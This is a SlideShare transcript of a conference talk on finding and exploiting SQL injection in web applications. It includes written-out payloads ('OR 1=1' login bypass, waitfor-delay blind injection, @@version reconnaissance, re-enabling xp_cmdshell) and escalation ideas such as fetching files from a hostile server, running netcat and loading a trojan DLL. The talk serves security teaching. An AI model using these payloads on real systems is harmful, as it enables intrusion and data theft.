SQL Injection


Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

SQL Injection

  1. 1. SQL Injection ~ Finding SQL Injection problems in 34 minutes Daniel Uriah Clemens
  2. 2. SQL Injection ~ Big Ideas <ul><li>These four attitudes will help us on our journey – </li></ul><ul><li>1. Courage – Be a hunter for information! </li></ul><ul><li>2. Humility – Remember you too, must ask questions! </li></ul><ul><li>3. Faith – The vulnerabilities exist, you must discover them! </li></ul><ul><li>4. Perseverance – Running a race takes endurance, and so does exploiting vulnerabilities. </li></ul>Daniel Uriah Clemens
  3. 3. SQL Injection ~ Goals for this talk? <ul><li>Overview of SQL Injection (what is SQL Injection?) </li></ul><ul><li>How to Identify for SQL Injection Problems </li></ul><ul><li>Impacts from SQL Injection </li></ul><ul><li>Attack Patterns </li></ul><ul><li>Conclusion and Demo ( if time permits ) </li></ul>Daniel Uriah Clemens
  4. 4. SQL Injection ~ Overview - What is SQL Injection? Where does it take place? <ul><li>SQL Injection takes place in a few places. </li></ul><ul><li>Input accepted from a website passed to a backend database. </li></ul><ul><li>Stored procedures within a database </li></ul>Daniel Uriah Clemens
  5. 5. SQL Injection ~ Daniel Uriah Clemens PacketNinjas L.L.C
  6. 6. SQL Injection ~ How to identify injection points? <ul><li>Methdology </li></ul><ul><li>Identify how the web application works. </li></ul><ul><ul><li>Does it solely operate on POST’s from the client? </li></ul></ul><ul><ul><li>Does it operate on server side dynamic content creation? </li></ul></ul><ul><ul><li>Remember asking the correct questions gets you the prize! </li></ul></ul><ul><ul><li>Are any parameters within the website manipulatable? </li></ul></ul>Daniel Uriah Clemens
  7. 7. SQL Injection ~ Generic Checklist <ul><li>Mirror Website – Identify all comments in code (html or javascript) Learn how things work. </li></ul><ul><li>Identify webapplication platform. </li></ul><ul><li>Identify how the webapplication works. </li></ul><ul><li>GET(s) </li></ul><ul><ul><li>Identify variables passed to application server or database </li></ul></ul><ul><li>POST(s) </li></ul><ul><ul><li>Track down every input passed to the server within a POST </li></ul></ul><ul><ul><ul><li>Map out the desired input types you want to look at. </li></ul></ul></ul><ul><ul><ul><li>-- </li></ul></ul></ul><ul><ul><ul><li>6) Start fuzzing the input with the power of “ ‘ “ </li></ul></ul></ul>Daniel Uriah Clemens
  8. 8. SQL Injection ~ Tools to aid you <ul><li>Brain </li></ul><ul><li>HTTP Reference Guide </li></ul><ul><li>HTTRACK </li></ul><ul><li>SQL Query Analyzers </li></ul><ul><li>WebProxy’s </li></ul><ul><ul><li>AtStake WebProxy </li></ul></ul><ul><ul><li>ImmunitySec – Spike </li></ul></ul><ul><ul><li>WebScarab </li></ul></ul><ul><ul><li>ParosProxy </li></ul></ul>Daniel Uriah Clemens
  9. 9. SQL Injection ~ Example Server side input
  10. 10. SQL Injection ~ Response <ul><li>Map out responses. </li></ul><ul><li>If there aren’t any responses don’t give up! </li></ul><ul><li>Look for client side input validation. If it exists edit it out of the equation with an html editor or a hex editor , or a proxy server. </li></ul><ul><li>If there were no responses do things blindly with waitfor statements to see if sql syntax is getting executed. ‘OR 1 = 1 ‘+’ waitfor delay ‘0:0:03’ – </li></ul><ul><li>‘ SELECT * ‘||’ waitfor delay ‘0:0:03’ -- </li></ul>Daniel Uriah Clemens
  11. 11. SQL Injection ~ Finding SQL injection <ul><li>Once you have found places that are processing or pulling data from a database….. </li></ul><ul><li>1)You want to test injection on the back end database. </li></ul><ul><li>- Straighforward Injection - Enter your “ ` “ ‘s look for exceptions </li></ul><ul><li>user = joe ‘ OR 1 = 1 – sp_passwd </li></ul><ul><li>pass = whateveriwan </li></ul><ul><li>- Blind Injection – Enter your “ ‘ “ ‘s with SQL delay’s. ‘;waitfor delay ‘0:0:10’ -- </li></ul>Daniel Uriah Clemens
  12. 12. SQL Injection ~ Exploiting SQL Injection <ul><li>The goal is to find out where you have landed in your sql statement. </li></ul><ul><li>Usually this is a SELECT statement…how do you find out where you are in the SQL Statement? </li></ul><ul><li>What can you do with this once you have found where you land in an SQL statement? </li></ul>Daniel Uriah Clemens
  13. 13. SQL Injection ~ What can we do with this? Daniel Uriah Clemens
  14. 14. SQL Injection ~ Example Server Side Injection Daniel Uriah Clemens
  15. 15. SQL Injection ~ Recon.. (Microsoft) <ul><li>Identify Server patch level @@version (remember this is probably SELECT @@version -- ) Variants include (blind) </li></ul><ul><li>); @@version &quot;||&quot; select user waitfor delay '0:0:10'-- </li></ul><ul><li>( OUTPUT ) Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) </li></ul>Daniel Uriah Clemens
  16. 16. SQL Injection ~ Escalation Step 2 ( Identify db user) <ul><li>(remember the key is where you land in the select statement ) </li></ul><ul><li>user - - (no spaces but put them in to show the need) </li></ul><ul><li>if user ='dbo' SELECT @@version '+' select user -- </li></ul><ul><li>‘ +’ select user -- (concatentate your request) </li></ul>Daniel Uriah Clemens If everything went well and our desired result was ‘dbo’ Then we can expand our priviledges to doing anything we want!
  17. 17. SQL Injection ~ Basic System Compromise <ul><li>Execute stored procedures to download a file from your hostile server </li></ul><ul><li>OR </li></ul><ul><li>2) If you are firewalled……. </li></ul><ul><li>Stored procedures include xp_cmdshell </li></ul>Daniel Uriah Clemens
  18. 18. SQL Injection ~ <ul><li>Upload a binary into a table, then have it flushed to disk and then start netcat…  </li></ul><ul><li>This is tricky because you have to break your binary into parts and stuff since one table can only 8000chars. </li></ul>Daniel Uriah Clemens
  19. 19. SQL Injection ~ System compromise <ul><li>Questions – What if we turned off stored procedures? </li></ul><ul><li>A) It doesn’t matter if I am dbo , I can turn them on again.  </li></ul><ul><li>exec sp_addextendedproc N'xp_cmdshell', N'xplog70.dll‘ (this will turn our stored procedure back on)….we could also be sneaky and load any dll we want into the database and have it work as a trojan or something… hrm…. </li></ul>Daniel Uriah Clemens
  20. 20. SQL Injection ~ Other thoughts <ul><li>1)Most Publicly accessbile databases are clustered so you just rooted tons of boxes. </li></ul><ul><li>2) If the database isn’t microsoft and its oracle… well, it gets even better. </li></ul>Daniel Uriah Clemens
  21. 21. SQL Injection ~ ORACLE Injection <ul><li>Follow our methodology </li></ul><ul><li>Find insertion points </li></ul><ul><li>Figure out where we land in the select statement </li></ul><ul><li>Verify database type </li></ul><ul><li>Utilize stored procedures... (oracle has millions of stored procedures (I think above 900). </li></ul><ul><li>OR use JAVA.io  OR overflow a stored procedure in oracle OR SQL inject within a stored procedure in ORACLE. </li></ul>Daniel Uriah Clemens
  22. 22. SQL Injection ~ Other Attack patterns <ul><li>Watch weblogs for large amounts of small requests. </li></ul><ul><li>Watch weblogs for any strange HTTP error codes that would be anything other than a 200 accept. </li></ul><ul><ul><li>302’s or 500 error codes </li></ul></ul><ul><ul><li>Persistent connections to a webapplication. </li></ul></ul><ul><ul><li>End users spidering website </li></ul></ul><ul><ul><li>Database crashes </li></ul></ul>Daniel Uriah Clemens
  23. 23. SQL Injection ~ Conclusion <ul><li>We have scratched the surface with the basics of SQL injection. </li></ul><ul><li>Next time we can talk about other things </li></ul><ul><li>Generating a webapplication assessment program </li></ul><ul><li>Advanced exploitation techniques and tricks </li></ul>Daniel Uriah Clemens
  24. 24. SQL Injection ~ Thank you! <ul><li>Special thanks to God for Life,joy , strength and hope! </li></ul><ul><li>Everyone at work that puts up with me! </li></ul><ul><li>Infragard members that let me share ideas! </li></ul>Daniel Uriah Clemens